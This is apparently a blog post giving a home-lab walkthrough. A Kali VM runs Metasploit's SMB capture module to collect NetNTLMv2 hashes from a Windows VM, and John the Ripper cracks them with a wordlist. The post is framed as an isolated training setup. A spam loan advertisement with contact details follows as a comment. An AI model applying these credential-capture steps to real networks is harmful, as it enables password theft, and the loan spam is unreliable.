create 2 vms in virtualbox
1.) kali linux ATTACKER
will be used to run ettercap and perform man-in-the-middle
2.) windows VICTIM
will be the victim trying to access the web server
steps
-------
1.) setup both virtualbox Network tab to use "Internal Network" and the same name
2.) power up both
3.) windows will already have an ip address such as 169.254.18.1
4.) configure kali linux ATTACKER to similar ip address as windows
ifconfig eth0 169.254.18.2 netmask 255.255.0.0 up
5.) ping each other from within each virtual machine to ensure connectivity
6.) on kali linux ATTACKER system start the metasploit smb capture module
> msfconsole
msf> use auxillary/server/capture/smb
msf> set CAINPWFILE /tmp/cain.pw1
msf> set JOHNPWFILE /tmp/john.txt
exploit
7.) on windows VICTIM system open windows explorer and try to connect to the attacker box
\\169.254.18.2\
windows will popup an authentication prompt, enter a user & password (e.g. guy, password)
8.) on kali linux ATTACKER system metasploit should inform you it captured a hash and saved it to \tmp\john.txt
type exit to exit metasploit
run john against the newly captured file
> john /tmp/john.txt_netntlmv2 --wordlist /usr/share/wordlists/rockyou.txt
if it's a weak password (like 'password') john should crack it quickly and display it to you on the screen
Are you in need of finance? we give out guarantee cash at 3% interest rate. Contact us on any kind of finance now: financialserviceoffer876@gmail.com whatsapp Number +918929509036 Dr James Eric Finance Pvt Ltd
ReplyDelete